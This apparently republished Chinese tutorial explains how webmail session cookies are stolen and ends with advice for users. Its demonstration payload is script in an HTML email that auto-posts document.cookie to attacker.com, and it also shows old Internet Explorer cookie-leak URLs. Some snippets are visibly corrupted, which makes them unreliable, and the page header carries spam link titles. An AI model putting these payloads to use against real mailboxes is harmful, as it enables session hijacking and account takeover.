国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 服務(wù)器 > Mail服務(wù)器 > 正文

Webmail攻防實(shí)戰(zhàn)(6)_Mail服務(wù)器教程

2024-09-08 23:46:25
字體:
供稿:網(wǎng)友
  如果攻擊者能夠獲取用戶WebMail的cookie信息,那么就能很容易地侵入用戶的WebMail。攻擊者如何獲取用戶WebMail的cookie信息呢?如果攻擊者在用戶的電腦上安裝了木馬,或者能夠從網(wǎng)絡(luò)線路上對(duì)用戶進(jìn)行嗅探偵聽,那么獲取cookie信息自然不成問題,不過這并不是我們討論問題的意義所在,因?yàn)槎寄軌蜻@樣了,又何必大費(fèi)周折去獲取cookie信息,直接獲取郵箱密碼就是了。

  如果WebMail系統(tǒng)存在跨站腳本執(zhí)行漏洞,那么攻擊者就能欺騙用戶從而輕易地獲取cookie信息,雖然眾多網(wǎng)站存在此漏洞,但存在此漏洞的WebMail系統(tǒng)還很少見。

  含有惡性腳本程序的html郵件能使攻擊者獲取WebMail的cookie信息。Html郵件中的腳本程序先提取當(dāng)前WebMail的cookie信息,然后把它賦值給某個(gè)表單元素,再將表單自動(dòng)提交給攻擊者,攻擊者從而獲得cookie會(huì)話信息。下面是一段演示程序:

<body>
<form method="post" action="http://attacker.com/getcookie.cgi" name="myform">
<input name="session" type="hidden">
</form>

<script language="JavaScript">
var cookie=(document.cookie);
alert(cookie);//這一句用于顯示當(dāng)前cookie信息,當(dāng)然,攻擊者不會(huì)這樣做。
document.myform.session.value=cookie;
document.myform.submit();
</script>

  getcookie.cgi是放在攻擊者Web服務(wù)器上的一個(gè)cgi程序,用于獲取表單提交過來的cookie信息,并且做記錄或者通知攻擊者。當(dāng)然,攻擊者會(huì)把html郵件、getcookie.cgi程序設(shè)計(jì)得更隱蔽,更具欺騙性,讓用戶難以察覺。

  通常,瀏覽器根據(jù)web服務(wù)器的域名來分別保存cookie信息,并且只會(huì)把cookie信息發(fā)送給同一域名的Web服務(wù)器。不過,瀏覽器的漏洞給攻擊者獲取不同域名的cookie信息創(chuàng)造了機(jī)會(huì),Internet Explorer、Netscape和Mozilla等被廣泛使用的瀏覽器都存在過此類漏洞。下面是幾個(gè)Internet Explorer瀏覽器(針對(duì)IE5.0、IE5.5或ie6.0)泄漏cookie信息的例子:

  (1) Html語言中的object元素用于在當(dāng)前頁面內(nèi)嵌入外部對(duì)象,但I(xiàn)nternet Explorer瀏覽器對(duì)object元素屬性的處理不當(dāng)會(huì)導(dǎo)致任意域的cookie信息被泄漏,演示代碼如下:

<o(jì)bject id="data" data="empty.html" type="text/html"></object>
<script>
var ref=document.getElementById("data").object;
ref.location.,5000);
</script>

  (2) Internet Explorer瀏覽器錯(cuò)誤處理“about”協(xié)議使得一個(gè)精心構(gòu)造的URL請(qǐng)求可能會(huì)顯示或修改任意域的cookie信息,例如(以下代碼在同一行):

  about://www.anydomain.com/<script language=JavaScript>alert(document.cookie);</script>

  (3) Internet Explorer瀏覽器會(huì)誤把URL中“%20”(空格符的URL編碼)字符串之前的主機(jī)名當(dāng)做cookie信息所在的域,并且發(fā)送出去。假設(shè)攻擊者有一個(gè)域名“attacker.com”,攻擊者把它做成泛域名解析,即把“*.attacker.com”指向攻擊者Web服務(wù)器所在的IP地址,“attacker.com”下的任何子域名或主機(jī)名都會(huì)被解析成這個(gè)IP地址,當(dāng)用戶提交了類似下面這樣的URL后,瀏覽器就會(huì)把“anydomain.com”域名的cookie信息發(fā)送給攻擊者:

  http://anydomain.com%20.attacker.com/getcookie.cgi

  如果攻擊者要獲取WebMail的臨時(shí)型cookie信息,就會(huì)在html郵件中寫入相應(yīng)的代碼,在用戶瀏覽郵件時(shí),該代碼自動(dòng)執(zhí)行,使得攻擊者能夠獲取當(dāng)前瀏覽器里的臨時(shí)cookie信息,也可以把用于獲取cookie信息的URL發(fā)送給用戶,誘騙用戶打開該URL,這樣攻擊者也能獲取臨時(shí)cookie信息。

  在攻擊者獲取cookie信息后,如果cookie信息里含有密碼等敏感信息,那么攻擊者就能很輕易地侵入用戶的郵箱,雖然hotmail等WebMail系統(tǒng)曾經(jīng)發(fā)生過此類的情況,但cookie信息泄漏敏感信息的WebMail系統(tǒng)還很少見。

  攻擊者在獲取cookie信息之后,還要讓此cookie信息由瀏覽器來存取從而與WebMail系統(tǒng)建立會(huì)話,這樣才能侵入用戶的WebMail。如果是持久型cookie信息,攻擊者所要做的是把這個(gè)信息復(fù)制到自己的cookie文件中去,由瀏覽器存取該cookie信息從而與WebMail系統(tǒng)建立會(huì)話,不過臨時(shí)cookie信息存儲(chǔ)在內(nèi)存中,并不容易讓瀏覽器存取。

  為了讓瀏覽器存取臨時(shí)cookie信息,攻擊者可以編輯內(nèi)存中的cookie信息,或者修改公開源代碼的瀏覽器,讓瀏覽器能夠編輯cookie信息,不過這樣都不是很簡便的方法,簡便的方法是使用Achilles程序(packetstormsecurity.org網(wǎng)站有下載)。Achilles是一個(gè)http代理服務(wù)器,能夠載取瀏覽器和Web服務(wù)器間的http會(huì)話信息,并且在代理轉(zhuǎn)發(fā)數(shù)據(jù)之前可以編輯http會(huì)話以及臨時(shí)cookie信息。

  WebMail系統(tǒng)應(yīng)該避免使用持久型cookie會(huì)話跟蹤,使攻擊者在cookie會(huì)話攻擊上不能輕易得逞。為了防止cookie會(huì)話攻擊,用戶可以采取如下措施以加強(qiáng)安全:

  (1) 設(shè)置瀏覽器的cookie安全級(jí)別,阻止所有cookie或者只接受某幾個(gè)域的cookie。

  (2) 使用cookie管理工具,增強(qiáng)系統(tǒng)cookie安全,如Cookie Pal、Burnt Cookies等。

  (3) 及時(shí)給瀏覽器打補(bǔ)丁,防止cookie信息泄漏。

發(fā)表評(píng)論 共有條評(píng)論
用戶名: 密碼:
驗(yàn)證碼: 匿名發(fā)表
主站蜘蛛池模板: 开封市| 东丽区| 白城市| 钦州市| 墨竹工卡县| 大宁县| 平果县| 双牌县| 云梦县| 敖汉旗| 浦县| 五家渠市| 中方县| 镇江市| 普兰店市| 金门县| 东台市| 乐清市| 迁西县| 长宁县| 姚安县| 文登市| 迁安市| 厦门市| 望谟县| 务川| 九台市| 依兰县| 封丘县| 隆子县| 临夏县| 墨脱县| 施甸县| 抚州市| 友谊县| 崇左市| 赤城县| 怀集县| 长阳| 田阳县| 桂阳县|